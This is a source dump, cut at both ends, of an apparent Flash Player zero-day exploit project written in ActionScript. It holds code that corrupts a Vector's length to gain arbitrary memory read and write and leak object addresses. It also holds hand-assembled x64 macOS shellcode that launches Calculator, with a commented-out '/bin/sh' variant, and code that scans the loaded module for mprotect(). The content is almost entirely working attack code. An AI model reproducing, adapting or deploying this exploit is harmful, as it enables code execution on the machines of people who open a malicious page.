107 | 										logAdd("todo: unsupported x86 os");
108 | 								}
109 | 								
110 | 								logAdd("v.length = 0x" + v.length.toString(16));
111 | 								return true;
112 | 							}
113 | 							
114 | 							logAdd("bad MyClass2 allocation.");
115 | 							break;
116 | 						}
117 | 					}
118 | 				}
119 | 				
120 | 				logAdd("bad allocation. try again.");
121 | 			}
122 | 			catch (e:Error) 
123 | 			{
124 | 				logAdd("TryExpl() " + e.toString());
125 | 			}
126 | 			
127 | 			return false;
128 | 		}
129 | 		
130 | 		// 
131 | 		static function btnClickHandler(e:MouseEvent):void 
132 | 		{
133 | 			try
134 | 			{	
135 | 				logAdd("===== start =====");
136 | 				
137 | 				// try to exploit
138 | 				TryExpl();
139 | 				
140 | 				logAdd("=====  end  =====");
141 | 			}
142 | 			catch (e:Error) 
143 | 			{
144 | 				logAdd(e.toString());
145 | 			}
146 | 		}
147 | 		
148 | 		// init GUI elements
149 | 		static public function InitGui(doc: DisplayObjectContainer)
150 | 		{
151 | 			try
152 | 			{
153 | 				// add text area
154 | 				_log = new TextArea(); 
155 | 				_log.move(20,2);
156 | 				_log.setSize(560, 360); 
157 | 				_log.condenseWhite = true; 
158 | 				_log.editable = false;
159 | 				doc.addChild(_log);
160 | 				
161 | 				// add the button
162 | 				var btn:Button = new Button();
163 | 				btn.label = "Run" + (MyUtils.isWin() ? " calc.exe":"");
164 | 				btn.move(220, 370);
165 | 				btn.setSize(160,26);
166 | 				btn.addEventListener(MouseEvent.CLICK, btnClickHandler);
167 | 				doc.addChild(btn);
168 | 			
169 | 				// print environment info
170 | 				logAdd("Flash: " + Capabilities.version + (Capabilities.isDebugger ? " Debug":"")
171 | 						+ " " + Capabilities.cpuArchitecture + (is32() ? "-32" : is64() ? "-64":"") + " " + Capabilities.playerType);
172 | 				logAdd("OS: " + Capabilities.os  + (Capabilities.supports64BitProcesses ? " 64-bit":" 32-bit"));
173 | 			
174 | 				if (ExternalInterface.available)
175 | 					logAdd("Browser: " + callJS("getEnvInfo"));
176 | 			}
177 | 			catch (e:Error) 
178 | 			{
179 | 				logAdd("InitGui() " + e.toString());
180 | 			}
181 | 		}
182 | 		
183 | 		// calls JavaScript function
184 | 		static function callJS(func:String):String 
185 | 		{
186 | 			try
187 | 			{
188 | 				if (ExternalInterface.available)
189 | 					return "" + ExternalInterface.call(func);
190 | 			}
191 | 			catch (e:Error) 
192 | 			{
193 | 			}
194 | 			return "";
195 | 		}
196 | 		
197 | 		// checks for x32/x64 platform
198 | 		static var _platform:String;
199 | 		
200 | 		static function is32():Boolean
201 | 		{
202 | 			var x64:Boolean = Capabilities.supports64BitProcesses;
203 | 			if (x64 && MyUtils.isWin()) {
204 | 				// FP can be 32-bit on Windows x64
205 | 				if (_platform == null) _platform = callJS("getPlatform");
206 | 				return _platform.search("32") >= 0;
207 | 			}
208 | 			return !x64;
209 | 		}
210 | 		
211 | 		static function is64():Boolean
212 | 		{
213 | 			var x64:Boolean = Capabilities.supports64BitProcesses;
214 | 			if (x64 && MyUtils.isWin()) {
215 | 				// FP can be 32-bit on Windows x64
216 | 				if (_platform == null) _platform = callJS("getPlatform");
217 | 				return _platform.search("64") >= 0;
218 | 			}
219 | 			return x64;
220 | 		}
221 | 	}
222 | 
223 | }


--------------------------------------------------------------------------------
/flash0day/exp1/MyClass1.as:
--------------------------------------------------------------------------------
1 | package
2 | {
3 | 	import flash.utils.ByteArray;
4 | 	
5 | 	class MyClass1 extends ByteArray
6 | 	{
7 | 		var o1:Object, o2:Object, o3:Object, o4:Object;
8 | 	}	
9 | }


--------------------------------------------------------------------------------
/flash0day/exp1/MyClass2.as:
--------------------------------------------------------------------------------
  1 | package
  2 | {
  3 | 	class MyClass2 extends MyClass1
  4 | 	{
  5 | 		var					
  6 | 			// enlarge the MyClass2 size by dummy attributes
  7 | 			a0 :uint, a1 :uint, a2 :uint, a3 :uint, a4 :uint, a5 :uint, a6 :uint, a7 :uint, a8 :uint, a9 :uint, 
  8 | 			a10:uint, a11:uint, a12:uint, a13:uint, a14:uint, a15:uint, a16:uint, a17:uint, a18:uint, a19:uint,
  9 | 			a20:uint, a21:uint, a22:uint, a23:uint, a24:uint, a25:uint, a26:uint, a27:uint, a28:uint, a29:uint, 
 10 | 			a30:uint, a31:uint, a32:uint, a33:uint, a34:uint, a35:uint, a36:uint, a37:uint, a38:uint, a39:uint, 
 11 | 			a40:uint, a41:uint, a42:uint, a43:uint, a44:uint, a45:uint, a46:uint, a47:uint, a48:uint, a49:uint, 
 12 | 			a50:uint, a51:uint, a52:uint, a53:uint, a54:uint, a55:uint, a56:uint, a57:uint, a58:uint, a59:uint, 
 13 | 			a60:uint, a61:uint, a62:uint, a63:uint, a64:uint, a65:uint, a66:uint, a67:uint, a68:uint, a69:uint, 
 14 | 			a70:uint, a71:uint, a72:uint, a73:uint, a74:uint, a75:uint, a76:uint, a77:uint, a78:uint, a79:uint, 
 15 | 			a80:uint, a81:uint, a82:uint, a83:uint, a84:uint, a85:uint, a86:uint, a87:uint, a88:uint, a89:uint, 
 16 | 			a90:uint, a91:uint, a92:uint, a93:uint, a94:uint, a95:uint, a96:uint, a97:uint, a98:uint, a99:uint,
 17 | 			
 18 | 			a100:uint, a101:uint, a102:uint, a103:uint, a104:uint, a105:uint, a106:uint, a107:uint, a108:uint, a109:uint,
 19 | 			a110:uint, a111:uint, a112:uint, a113:uint, a114:uint, a115:uint, a116:uint, a117:uint, a118:uint, a119:uint,
 20 | 			a120:uint, a121:uint, a122:uint, a123:uint, a124:uint, a125:uint, a126:uint, a127:uint, a128:uint, a129:uint,
 21 | 			a130:uint, a131:uint, a132:uint, a133:uint, a134:uint, a135:uint, a136:uint, a137:uint, a138:uint, a139:uint,
 22 | 			a140:uint, a141:uint, a142:uint, a143:uint, a144:uint, a145:uint, a146:uint, a147:uint, a148:uint, a149:uint,
 23 | 			a150:uint, a151:uint, a152:uint, a153:uint, a154:uint, a155:uint, a156:uint, a157:uint, a158:uint, a159:uint,
 24 | 			a160:uint, a161:uint, a162:uint, a163:uint, a164:uint, a165:uint, a166:uint, a167:uint, a168:uint, a169:uint,
 25 | 			a170:uint, a171:uint, a172:uint, a173:uint, a174:uint, a175:uint, a176:uint, a177:uint, a178:uint, a179:uint,
 26 | 			a180:uint, a181:uint, a182:uint, a183:uint, a184:uint, a185:uint, a186:uint, a187:uint, a188:uint, a189:uint,
 27 | 			a190:uint, a191:uint, a192:uint, a193:uint, a194:uint, a195:uint, a196:uint, a197:uint, a198:uint, a199:uint,
 28 | 
 29 | 			a200:uint, a201:uint, a202:uint, a203:uint, a204:uint, a205:uint, a206:uint, a207:uint, a208:uint, a209:uint,
 30 | 			a210:uint, a211:uint, a212:uint, a213:uint, a214:uint, a215:uint, a216:uint, a217:uint, a218:uint, a219:uint,
 31 | 			a220:uint, a221:uint, a222:uint, a223:uint, a224:uint, a225:uint, a226:uint, a227:uint, a228:uint, a229:uint, 
 32 | 			a230:uint, a231:uint, a232:uint, a233:uint, a234:uint, a235:uint, a236:uint, a237:uint, a238:uint, a239:uint,
 33 | 			a240:uint, a241:uint, a242:uint, a243:uint, a244:uint, a245:uint, a246:uint, a247:uint, a248:uint, a249:uint,
 34 | 			a250:uint, a251:uint, a252:uint, a253:uint, a254:uint, a255:uint, a256:uint, a257:uint, a258:uint, a259:uint,
 35 | 			a260:uint, a261:uint, a262:uint, a263:uint, a264:uint, a265:uint, a266:uint, a267:uint, a268:uint, a269:uint,
 36 | 			a270:uint, a271:uint, a272:uint, a273:uint, a274:uint, a275:uint, a276:uint, a277:uint, a278:uint, a279:uint,
 37 | 			a280:uint, a281:uint, a282:uint, a283:uint, a284:uint, a285:uint, a286:uint, a287:uint, a288:uint, a289:uint,
 38 | 			a290:uint, a291:uint, a292:uint, a293:uint, a294:uint, a295:uint, a296:uint, a297:uint, a298:uint, a299:uint,
 39 | 
 40 | 			a300:uint, a301:uint, a302:uint, a303:uint, a304:uint, a305:uint, a306:uint, a307:uint, a308:uint, a309:uint,
 41 | 			a310:uint, a311:uint, a312:uint, a313:uint, a314:uint, a315:uint, a316:uint, a317:uint, a318:uint, a319:uint,
 42 | 			a320:uint, a321:uint, a322:uint, a323:uint, a324:uint, a325:uint, a326:uint, a327:uint, a328:uint, a329:uint, 
 43 | 			a330:uint, a331:uint, a332:uint, a333:uint, a334:uint, a335:uint, a336:uint, a337:uint, a338:uint, a339:uint,
 44 | 			a340:uint, a341:uint, a342:uint, a343:uint, a344:uint, a345:uint, a346:uint, a347:uint, a348:uint, a349:uint,
 45 | 			a350:uint, a351:uint, a352:uint, a353:uint, a354:uint, a355:uint, a356:uint, a357:uint, a358:uint, a359:uint,
 46 | 			a360:uint, a361:uint, a362:uint, a363:uint, a364:uint, a365:uint, a366:uint, a367:uint, a368:uint, a369:uint,
 47 | 			a370:uint, a371:uint, a372:uint, a373:uint, a374:uint, a375:uint, a376:uint, a377:uint, a378:uint, a379:uint,
 48 | 			a380:uint, a381:uint, a382:uint, a383:uint, a384:uint, a385:uint, a386:uint, a387:uint, a388:uint, a389:uint,
 49 | 			a390:uint, a391:uint, a392:uint, a393:uint, a394:uint, a395:uint, a396:uint, a397:uint, a398:uint, a399:uint,
 50 | 
 51 | 			a400:uint, a401:uint, a402:uint, a403:uint, a404:uint, a405:uint, a406:uint, a407:uint, a408:uint, a409:uint,
 52 | 			a410:uint, a411:uint, a412:uint, a413:uint, a414:uint, a415:uint, a416:uint, a417:uint, a418:uint, a419:uint,
 53 | 			a420:uint, a421:uint, a422:uint, a423:uint, a424:uint, a425:uint, a426:uint, a427:uint, a428:uint, a429:uint,
 54 | 			a430:uint, a431:uint, a432:uint, a433:uint, a434:uint, a435:uint, a436:uint, a437:uint, a438:uint, a439:uint,
 55 | 			a440:uint, a441:uint, a442:uint, a443:uint, a444:uint, a445:uint, a446:uint, a447:uint, a448:uint, a449:uint,
 56 | 			a450:uint, a451:uint, a452:uint, a453:uint, a454:uint, a455:uint, a456:uint, a457:uint, a458:uint, a459:uint,
 57 | 			a460:uint, a461:uint, a462:uint, a463:uint, a464:uint, a465:uint, a466:uint, a467:uint, a468:uint, a469:uint,
 58 | 			a470:uint, a471:uint, a472:uint, a473:uint, a474:uint, a475:uint, a476:uint, a477:uint, a478:uint, a479:uint,
 59 | 			a480:uint, a481:uint, a482:uint, a483:uint, a484:uint, a485:uint, a486:uint, a487:uint, a488:uint, a489:uint,
 60 | 			a490:uint, a491:uint, a492:uint, a493:uint, a494:uint, a495:uint, a496:uint, a497:uint, a498:uint, a499:uint,
 61 | 			
 62 | 			a500:uint, a501:uint, a502:uint, a503:uint, a504:uint, a505:uint, a506:uint, a507:uint, a508:uint, a509:uint,
 63 | 			a510:uint, a511:uint, a512:uint, a513:uint, a514:uint, a515:uint, a516:uint, a517:uint, a518:uint, a519:uint,
 64 | 			a520:uint, a521:uint, a522:uint, a523:uint, a524:uint, a525:uint, a526:uint, a527:uint, a528:uint, a529:uint,
 65 | 			a530:uint, a531:uint, a532:uint, a533:uint, a534:uint, a535:uint, a536:uint, a537:uint, a538:uint, a539:uint,
 66 | 			a540:uint, a541:uint, a542:uint, a543:uint, a544:uint, a545:uint, a546:uint, a547:uint, a548:uint, a549:uint,
 67 | 			a550:uint, a551:uint, a552:uint, a553:uint, a554:uint, a555:uint, a556:uint, a557:uint, a558:uint, a559:uint,
 68 | 			a560:uint, a561:uint, a562:uint, a563:uint, a564:uint, a565:uint, a566:uint, a567:uint, a568:uint, a569:uint,
 69 | 			a570:uint, a571:uint, a572:uint, a573:uint, a574:uint, a575:uint, a576:uint, a577:uint, a578:uint, a579:uint,
 70 | 			a580:uint, a581:uint, a582:uint, a583:uint, a584:uint, a585:uint, a586:uint, a587:uint, a588:uint, a589:uint,
 71 | 			a590:uint, a591:uint, a592:uint, a593:uint, a594:uint, a595:uint, a596:uint, a597:uint, a598:uint, a599:uint,
 72 | 			
 73 | 			a600:uint, a601:uint, a602:uint, a603:uint, a604:uint, a605:uint, a606:uint, a607:uint, a608:uint, a609:uint,
 74 | 			a610:uint, a611:uint, a612:uint, a613:uint, a614:uint, a615:uint, a616:uint, a617:uint, a618:uint, a619:uint,
 75 | 			a620:uint, a621:uint, a622:uint, a623:uint, a624:uint, a625:uint, a626:uint, a627:uint, a628:uint, a629:uint,
 76 | 			a630:uint, a631:uint, a632:uint, a633:uint, a634:uint, a635:uint, a636:uint, a637:uint, a638:uint, a639:uint,
 77 | 			a640:uint, a641:uint, a642:uint, a643:uint, a644:uint, a645:uint, a646:uint, a647:uint, a648:uint, a649:uint,
 78 | 			a650:uint, a651:uint, a652:uint, a653:uint, a654:uint, a655:uint, a656:uint, a657:uint, a658:uint, a659:uint,
 79 | 			a660:uint, a661:uint, a662:uint, a663:uint, a664:uint, a665:uint, a666:uint, a667:uint, a668:uint, a669:uint,
 80 | 			a670:uint, a671:uint, a672:uint, a673:uint, a674:uint, a675:uint, a676:uint, a677:uint, a678:uint, a679:uint,
 81 | 			a680:uint, a681:uint, a682:uint, a683:uint, a684:uint, a685:uint, a686:uint, a687:uint, a688:uint, a689:uint,
 82 | 			a690:uint, a691:uint, a692:uint, a693:uint, a694:uint, a695:uint, a696:uint, a697:uint, a698:uint, a699:uint,
 83 | 			
 84 | 			a700:uint, a701:uint, a702:uint, a703:uint, a704:uint, a705:uint, a706:uint, a707:uint, a708:uint, a709:uint,
 85 | 			a710:uint, a711:uint, a712:uint, a713:uint, a714:uint, a715:uint, a716:uint, a717:uint, a718:uint, a719:uint,
 86 | 			a720:uint, a721:uint, a722:uint, a723:uint, a724:uint, a725:uint, a726:uint, a727:uint, a728:uint, a729:uint,
 87 | 			a730:uint, a731:uint, a732:uint, a733:uint, a734:uint, a735:uint, a736:uint, a737:uint, a738:uint, a739:uint,
 88 | 			a740:uint, a741:uint, a742:uint, a743:uint, a744:uint, a745:uint, a746:uint, a747:uint, a748:uint, a749:uint,
 89 | 			a750:uint, a751:uint, a752:uint, a753:uint, a754:uint, a755:uint, a756:uint, a757:uint, a758:uint, a759:uint,
 90 | 			a760:uint, a761:uint, a762:uint, a763:uint, a764:uint, a765:uint, a766:uint, a767:uint, a768:uint, a769:uint,
 91 | 			a770:uint, a771:uint, a772:uint, a773:uint, a774:uint, a775:uint, a776:uint, a777:uint, a778:uint, a779:uint,
 92 | 			a780:uint, a781:uint, a782:uint, a783:uint, a784:uint, a785:uint, a786:uint, a787:uint, a788:uint, a789:uint,
 93 | 			a790:uint, a791:uint, a792:uint, a793:uint, a794:uint, a795:uint, a796:uint, a797:uint, a798:uint, a799:uint,
 94 | 			
 95 | 			a800:uint, a801:uint, a802:uint, a803:uint, a804:uint, a805:uint, a806:uint, a807:uint, a808:uint, a809:uint,
 96 | 			a810:uint, a811:uint, a812:uint, a813:uint, a814:uint, a815:uint, a816:uint, a817:uint, a818:uint, a819:uint,
 97 | 			a820:uint, a821:uint, a822:uint, a823:uint, a824:uint, a825:uint, a826:uint, a827:uint, a828:uint, a829:uint,
 98 | 			a830:uint, a831:uint, a832:uint, a833:uint, a834:uint, a835:uint, a836:uint, a837:uint, a838:uint, a839:uint,
 99 | 			a840:uint, a841:uint, a842:uint, a843:uint, a844:uint, a845:uint, a846:uint, a847:uint, a848:uint, a849:uint,
100 | 			a850:uint, a851:uint, a852:uint, a853:uint, a854:uint, a855:uint, a856:uint, a857:uint, a858:uint, a859:uint,
101 | 			a860:uint, a861:uint, a862:uint, a863:uint, a864:uint, a865:uint, a866:uint, a867:uint, a868:uint, a869:uint,
102 | 			a870:uint, a871:uint, a872:uint, a873:uint, a874:uint, a875:uint, a876:uint, a877:uint, a878:uint, a879:uint,
103 | 			a880:uint, a881:uint, a882:uint, a883:uint, a884:uint, a885:uint, a886:uint, a887:uint, a888:uint, a889:uint,
104 | 			a890:uint, a891:uint, a892:uint, a893:uint, a894:uint, a895:uint, a896:uint, a897:uint, a898:uint, a899:uint
105 | 			
106 | 			
107 | 		// constructor
108 | 		function MyClass2(id:int)
109 | 		{
110 | 			o1 = this; 
111 | 			a0 = id;
112 | 			for(var i:int=1; i < 64; i++) this["a"+i] = 0x11223344;
113 | 		}
114 | 	}	
115 | }


--------------------------------------------------------------------------------
/flash0day/exp1/MyUtils.as:
--------------------------------------------------------------------------------
 1 | package
 2 | {
 3 | 	import flash.utils.*;
 4 | 	import flash.system.Capabilities;
 5 | 
 6 | 	class MyUtils 
 7 | 	{
 8 | 		static var _bArr:ByteArray;
 9 | 		
10 | 		// converts Vector. to ByteArray
11 | 		static function ToByteArray(v:Vector., offs:uint, len:uint):ByteArray
12 | 		{
13 | 			if (_bArr == null) _bArr = new ByteArray();
14 | 			_bArr.length = len*4;
15 | 			_bArr.position = 0;
16 | 			_bArr.endian = Endian.LITTLE_ENDIAN;
17 | 			
18 | 			len += offs;
19 | 			for(; offs < len; offs++) _bArr.writeUnsignedInt(v[offs]);
20 | 			
21 | 			return _bArr;
22 | 		}		
23 | 		
24 | 		static function ToUintVector(a:Array)
25 | 		{
26 | 			var len:uint = a.length;
27 | 			var v:Vector. = new Vector.((len >>> 2) + (len % 4 ? 1:0));
28 | 			if (len > 1) {
29 | 				len--;
30 | 				for(var i:uint=0; i <= len; i++){		
31 | 					v[i >>> 2] += uint(a[i]) << ((i%4)*8);		
32 | 				}
33 | 			}else{
34 | 				if (len) v[0] = a[0];
35 | 			}
36 | 			return v;
37 | 		}
38 | 		
39 | 		// compares sequence of uints with string 
40 | 		static function IsEqual(v:Vector., s:String, offs:uint = 0):Boolean
41 | 		{			
42 | 			_bArr = ToByteArray(v, 0, v.length);
43 | 			_bArr.position = offs;
44 | 			for(var i:int=2; i >= 0; i--)
45 | 				if (_bArr[i] == 0) { _bArr.position = i+1 + offs; break; }
46 | 
47 | 			return _bArr.readUTFBytes(s.length).toUpperCase() == s;
48 | 		}
49 | 		
50 | 		//
51 | 		static function ToStringV(v:Vector., offs:uint, len:uint):String
52 | 		{
53 | 			var str:String = "", c:int;
54 | 			
55 | 			len += offs;
56 | 			for(; offs < len; offs++, c++) {
57 | 				str += v[offs].toString(16) + ",";
58 | 				if (c == 7) { str += "
"; c = -1; }
59 | 			}
60 | 			
61 | 			return str;
62 | 		}
63 | 		
64 | 		static function isWin():Boolean
65 | 		{
66 | 			return Capabilities.version.toUpperCase().search("WIN") >= 0;
67 | 		}
68 | 		
69 | 		static function isMac():Boolean
70 | 		{
71 | 			return Capabilities.version.toUpperCase().search("MAC") >= 0;
72 | 		}	
73 | 	}	
74 | }


--------------------------------------------------------------------------------
/flash0day/exp1/ShellMac64.as:
--------------------------------------------------------------------------------
  1 | package
  2 | {
  3 | 	import flash.utils.ByteArray;
  4 | 	import flash.utils.Endian;
  5 | 	import flash.system.Capabilities;
  6 | 	
  7 | 	class ShellMac64 extends MyClass
  8 | 	{
  9 | 		static var
 10 | 			_v:Vector.,	// uint vector with corrupted length
 11 | 			_vAddr:Number,		// _v[0] address
 12 | 			_base:Number,
 13 | 			_baseMax:Number,
 14 | 			_baseOld:Number,
 15 | 			_mc:MyClass2,		// descendant of ByteArray allocated right after _v[]
 16 | 			_mcOffs:uint,		// index of mc.o1 within _v[]
 17 | 			N32:Number 			= Math.pow(2,32),
 18 | 			
 19 | 			// x64 shellcode 
 20 | 			_x64:Vector. = MyUtils.ToUintVector([
 21 | 				// "calculator" payload
 22 | 				0x90,0x90,0x90,0x90,								// nops, just in case for alignment
 23 | 				0x56,0x57,											// push rsi; push edi
 24 | 				0x48,0x31,0xc0,                                		// xor rax, rax	
 25 | 				0x50, 												// push rax 
 26 | 				0x48,0x89,0xe6,                                		// mov rsi, rsp // local var = 0
 27 | 				
 28 | 				0x48,0xb8,0x42,0,0,2,0,0,0,0,						// mov rax, 0x2000042		
 29 | 				0x0f,0x05,                                      	// syscall vfork()			
 30 | 				0x83,0xf8,1,										// cmp eax,1 
 31 | 				0x74,0x69,											// je @@end // sandbox denied vfork()
 32 | 				0x48,0x83,0x3e,0x00, 								// cmp [rsi],0
 33 | 				0x75,0x63, 											// jne @@end // if (var != 0) skip execve() for parent process
 34 | 				
 35 | 					0x48,0xb8,0x3b,0,0,2,0,0,0,0,						// mov rax, 0x200003b
 36 | 					0x48,0x89,0x06, 									// mov [rsi], rax // set var != 0
 37 | 					0xe8,0x37,0,0,0, 									// call +55 // push string address
 38 | 					// db '/Applications/Calculator.app/Contents/MacOS/Calculator'
 39 | 					0x2F,0x41,0x70,0x70,0x6C,0x69,0x63,0x61,0x74,0x69,0x6F,0x6E,0x73,0x2F,0x43,0x61,0x6C,0x63,
 40 | 					0x75,0x6C,0x61,0x74,0x6F,0x72,0x2E,0x61,0x70,0x70,0x2F,0x43,0x6F,0x6E,0x74,0x65,0x6E,0x74,
 41 | 					0x73,0x2F,0x4D,0x61,0x63,0x4F,0x53,0x2F,0x43,0x61,0x6C,0x63,0x75,0x6C,0x61,0x74,0x6F,0x72,0x00,
 42 | 					//0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00, 			// db '/bin/sh' // update @@end offset too !!!
 43 | 					0x5f,												// pop rdi // pop string address into rdi
 44 | 					0x48,0x31,0xd2,                                		// xor rdx, rdx
 45 | 					0x52,                                        		// push rdx
 46 | 					0x57,                                        		// push rdi
 47 | 					0x48,0x89,0xe6,                                		// mov rsi, rsp
 48 | 					0x0f,0x05,                                      	// syscall execve()
 49 | 					0x48,0xb8,1,0,0,2,0,0,0,0,							// mov rax, 0x2000001
 50 | 					0x48,0x31,0xff,										// xor rdi,rdi
 51 | 					0x0f,0x05,                                      	// syscall exit // exit child process if execve() failed
 52 | 				
 53 | 				// @@end
 54 | 				//0x90,0x90,0x90,0x90,  0x90,0x90,0x90,0x90,  0x90,0x90,0x90,0x90,  0x90,0x90,0x90,0x90,
 55 | 				//0x90,0x90,0x90,0x90,  0x90,0x90,0x90,0x90,  0x90,0x90,0x90,0x90,  0x90,0x90,0x90,0x90,
 56 | 				0x5e, 												// pop rsi // restore esp
 57 | 				
 58 | 				/*
 59 | 				// "empty" payload 
 60 | 				0x90,0x90,0x90,0x90,  0x90,0x90,0x90,0x90,  0x90,0x90,0x90,0x90,  0x90,0x90,0x90,0x90,
 61 | 				0x90,0x90,0x90,0x90,  0x90,0x90,0x90,0x90,  0x90,0x90,0x90,0x90,  0x90,0x90,0x90,0x90,
 62 | 				0x90,0x90,0x90,0x90,  0x90,0x90,0x90,0x90,  0x90,0x90,0x90,0x90,  0x90,0x90,0x90,0x90,
 63 | 				0x90,0x90,0x90,0x90,  0x90,0x90,0x90,0x90,  0x90,0x90,0x90,0x90,  0x90,0x90,0x90,0x90,				
 64 | 				// returns 12345678
 65 | 				//0x48,0xB8,0x4E,0x61,0xBC,0,0,0,0,0, 				// mov rax, 0xBC614E				
 66 | 				0xC3												// ret
 67 | 				*/
 68 | 				
 69 | 				0x48,0xC1,0xE0,0x03,								// shl rax,3;
 70 | 				0x48,0x83,0xC0,0x06,								// add rax,6;	// set rax to AS3 int atom
 71 | 				0x5f,0x5e,											// pop edi; pop rsi
 72 | 				0xC3												// ret
 73 | 			]);
 74 | 			
 75 | 		// converts two uints to hex string
 76 | 		static function Hex(n:Number):String
 77 | 		{
 78 | 			if (n >= 0 && n <= 9) return n.toString() 
 79 | 			else return "0x" + n.toString(16);
 80 | 		}			
 81 | 		
 82 | 		// init global vars
 83 | 		static function Init(v:Vector., offs:uint, mc:MyClass2, mcOffs:uint):Boolean
 84 | 		{
 85 | 			_v = v; _mc = mc; _mcOffs = mcOffs;
 86 | 			
 87 | 			_vAddr = Get64(mcOffs, 0xfffff000) - offs + 0x10;
 88 | 			_baseOld = Get64(mcOffs-8);
 89 | 			logAdd("v[0] address = " + Hex(_vAddr));
 90 | 			logAdd("mc old base = " + Hex(_baseOld));
 91 | 			
 92 | 			// prepare new base for mc
 93 | 			v[6] = 0xffffffff; // ByteArray::capacity
 94 | 			v[7] = 0xfffffffe; // ByteArray::length
 95 | 			mc.endian = Endian.LITTLE_ENDIAN;
 96 | 			
 97 | 			// set new base
 98 | 			Set64(mcOffs-8, _vAddr);
 99 | 			_base = 0;
100 | 			_baseMax = 0xfffffff0;
101 | 			
102 | 			// check results
103 | 			var len:uint = mc.length;
104 | 			logAdd("mc.length = " + Hex(len));
105 | 			return len == v[7];
106 | 		}		
107 | 		
108 | 		// restores corrupted memory
109 | 		static function CleanUp()
110 | 		{
111 | 			// restore _v.length
112 | 			Set32(_vAddr - 0x10, 0x3f0);
113 | 			
114 | 			_v[6] = 0; // _mc.capacity
115 | 			_v[7] = 0; // _mc.length
116 | 		}
117 | 		
118 | 		// join two uints as uint64
119 | 		static function Num(low:uint, hi:uint):Number
120 | 		{
121 | 			var n:Number = hi;
122 | 			if (n != 0) n *= N32;
123 | 			n += low;
124 | 			return n;
125 | 		}
126 | 		
127 | 		// get high uint from uint64
128 | 		static function Hi(n:Number):uint
129 | 		{	
130 | 			return uint(Math.floor(n / N32) & (N32-1));
131 | 		}
132 | 		
133 | 		// get low uint from uint64
134 | 		static function Low(n:Number):uint
135 | 		{	
136 | 			return uint(n & (N32-1));
137 | 		}
138 | 		
139 | 		// reads uint64 from _v[]
140 | 		static function Get64(offs:uint, mask:uint = 0xffffffff):Number
141 | 		{
142 | 			return Num(_v[offs] & mask, _v[offs+1]);
143 | 		}
144 | 			
145 | 		// writes uint64 into _v[]
146 | 		static function Set64(offs:uint, n:Number)
147 | 		{
148 | 			_v[offs] = Low(n);
149 | 			_v[offs+1] = Hi(n);
150 | 		}
151 | 			
152 | 		// sets new address pointer for _mc[0]
153 | 		static function SetBase(addr:Number)
154 | 		{
155 | 			if (addr < _base || addr >= _baseMax) {
156 | 				Set64(4, addr); // _v[4],[5]
157 | 				_base = addr;
158 | 				_baseMax = addr + 0xfffffff0;
159 | 			}
160 | 		}
161 | 		
162 | 		// reads uint from the memory address
163 | 		static function Get32(addr:Number):uint
164 | 		{
165 | 		 	if (addr < 0x10000) throw new Error("Get32() at addr = " + Hex(addr)); // bad pointer
166 | 			
167 | 			SetBase(addr);
168 | 			_mc.position = uint((addr - _base) & (N32-1));
169 | 			return _mc.readUnsignedInt();
170 | 		}
171 | 		
172 | 		// writes uint into the memory address
173 | 		static function Set32(addr:Number, u:uint)
174 | 		{
175 | 		 	if (addr < 0x10000) throw new Error("Set32() to addr = " + Hex(addr)); // bad pointer
176 | 			
177 | 			SetBase(addr);
178 | 			_mc.position = uint((addr - _base) & (N32-1));
179 | 			_mc.writeUnsignedInt(u);
180 | 		}	
181 | 		
182 | 		// reads uint64 from the memory address
183 | 		static function Get(addr:Number):Number
184 | 		{
185 | 		 	if (addr < 0x10000) throw new Error("Get() at addr = " + Hex(addr)); // bad pointer
186 | 			
187 | 			SetBase(addr);
188 | 			_mc.position = uint((addr - _base) & (N32-1));
189 | 			var lo:uint = _mc.readUnsignedInt();
190 | 			var hi:uint = _mc.readUnsignedInt();
191 | 			return Num(lo,hi);
192 | 		}
193 | 		
194 | 		// writes uint64 into the memory address
195 | 		static function Set(addr:Number, n:Number)
196 | 		{
197 | 		 	if (addr < 0x10000) throw new Error("Set() to addr = " + Hex(addr)); // bad pointer
198 | 			
199 | 			SetBase(addr);
200 | 			_mc.position = uint((addr - _base) & (N32-1));
201 | 			_mc.writeUnsignedInt(Low(n));
202 | 			_mc.writeUnsignedInt(Hi(n));
203 | 		}		
204 | 		
205 | 		// returns object's address 
206 | 		static function GetAddr(obj:Object):Number
207 | 		{
208 | 			_mc.o1 = obj;
209 | 			return Get64(_mcOffs) - 1; // atom decrement
210 | 		}
211 | 		
212 | 		// get memory dump // for RnD
213 | 		static function Dump(addr:Number, len:uint):String
214 | 		{
215 | 			var str:String = "";
216 | 			for(var i:uint; i < len; i++, addr+=8) {
217 | 				str += Get(addr).toString(16) + ",";
218 | 				if (i % 8 == 7) str += "
";
219 | 			}
220 | 			return str;
221 | 		}
222 | 		
223 | 		// searches for the mprotect() address
224 | 		static function FindMP():Number
225 | 		{ 
226 | 			try 
227 | 			{				
228 | 				// find Mach64 header
229 | 				var b:Number = Get64(_mcOffs-4, 0xfffff000) - (Capabilities.playerType == "StandAlone" ? 0x1300000 : 0x1900000);
230 | 				//logAdd("b = " + Hex(b));
231 | 				for(var i:uint; i < 0x100; i++, b -= 0x1000){
232 | 					// check 'FEEDFACF'
233 | 					if (Get32(b) == 0xfeedfacf) { logAdd("module base = " + Hex(b)); break; } 
234 | 				}
235 | 				if (i >= 0x100) throw new Error("can't find FEEDFACF at " + Hex(b));
236 | 			
237 | 				// get number of load commands
238 | 				var lcn:uint = Get32(b + 0x10);
239 | 				var stub:Number = 0, sym:Number = 0, isym:Number = 0, str:Number = 0, s:Number, link:Number = 0, offs:Number = 0,  
240 | 					symCnt:uint, strCnt:uint, stubCnt:uint, stubIdx:uint, stubSize:uint, f:uint;
241 | 					
242 | 				// find LC_SEGMENT_64, LC_SYMTAB and LC_DYSYMTAB segments
243 | 				for(var lc:Number = b + 0x20; lcn > 0; lcn--) {
244 | 					f = Get32(lc);
245 | 					// check for LC_SEGMENT_64
246 | 					if (stub == 0 && f == 0x19) {
247 | 						// get number of sections 
248 | 						var sn:uint = Get32(lc + 0x40); 
249 | 						for(s = lc + 0x48; sn > 0; sn--, s+=0x50) {
250 | 							f = Get32(s + 0x40);
251 | 							// check S_SYMBOL_STUBS and S_ATTR_PURE_INSTRUCTIONS section flags
252 | 							if ((f & 0xff) == 8 && (f & 0x80000000) != 0) {
253 | 								stub = Get(s + 0x20);
254 | 								if (stub < b || stub <= Get32(s + 0x30)) stub += b;
255 | 								stubIdx = Get32(s + 0x44);
256 | 								stubSize = Get32(s + 0x48);
257 | 								if (stubSize == 6) stubCnt = Get32(s + 0x28) / stubSize;
258 | 								break;
259 | 							}
260 | 						}							
